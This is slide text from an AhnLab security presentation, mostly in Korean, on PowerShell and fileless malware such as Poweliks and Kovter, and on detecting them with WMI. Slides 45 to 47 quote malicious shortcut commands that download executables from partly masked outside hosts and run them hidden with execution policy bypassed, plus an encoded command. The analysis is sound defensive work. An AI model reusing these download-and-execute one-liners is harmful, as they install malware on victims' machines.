© AhnLab, Inc.
All rights reserved. 43 Office (DOC, DOCM, XLS, XLSM) • Macro 포함 문서 -
44.
© AhnLab, Inc.
All rights reserved. 44 Shortcut (LNK) • LNK -
45.
© AhnLab, Inc.
All rights reserved. 45 Shortcut (LNK) • Download - %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
46.
© AhnLab, Inc.
All rights reserved. 46 Shortcut (LNK) • Download - C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'
47.
© AhnLab, Inc.
All rights reserved. 47 Shortcut (LNK) • Encoding - C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………
48.
© AhnLab, Inc.
All rights reserved. 48 PowerShell (PS1) • PowerShell -
49.
05 Fileless Technique
50.
© AhnLab, Inc.
All rights reserved. 50 Fileless • FilelessTechnique으로이용 -Poweliks * Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
51.
© AhnLab, Inc.
All rights reserved. 51 Fileless • FilelessTechnique으로이용 -Poweliks
52.
© AhnLab, Inc.
All rights reserved. 52 Fileless 악성코드 • Kovter - Run항목읽을수없음
53.
© AhnLab, Inc.
All rights reserved. 53 Fileless 악성코드 • Kovter -mshta.exe를통해Script실행
54.
© AhnLab, Inc.
All rights reserved. 54 Fileless 악성코드 • Kovter -인코딩된데이터
55.
06 Case Study
56.
07 맺음말
57.
© AhnLab, Inc.
All rights reserved. 57 Error • WindowsPowerShell작동 중지 - 갑자기WindowsPowerShell에러가발생할수있음
58.
© AhnLab, Inc.
All rights reserved. 58 Response • WMI for Detectionand Response - * Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
59.
© AhnLab, Inc.
All rights reserved. 59 전망 • PowerShell의확장 - * Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
60.
© AhnLab, Inc.
All rights reserved. 전망 전망 JS, VBS 대체 ?! Obfuscation Cross-Platform
61.
© AhnLab, Inc.
All rights reserved. 61 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
62.
© AhnLab, Inc.
All rights reserved. 62 현재의 보안 문제 • Not reallya fair fight * source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
63.
© AhnLab, Inc.
All rights reserved. 63 현재의 보안 문제 • 모두가 함께 해야 하는 보안 * source:http://www.security-marathon.be/?p=1786
64.
© AhnLab, Inc.
All rights reserved. 64 Q&A email : minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
65.
© AhnLab, Inc.
All rights reserved. 65 Reference • Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014 • Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent, Asyncronous,andFilelessBackdoor’,2015 • Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015 • 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016
Download now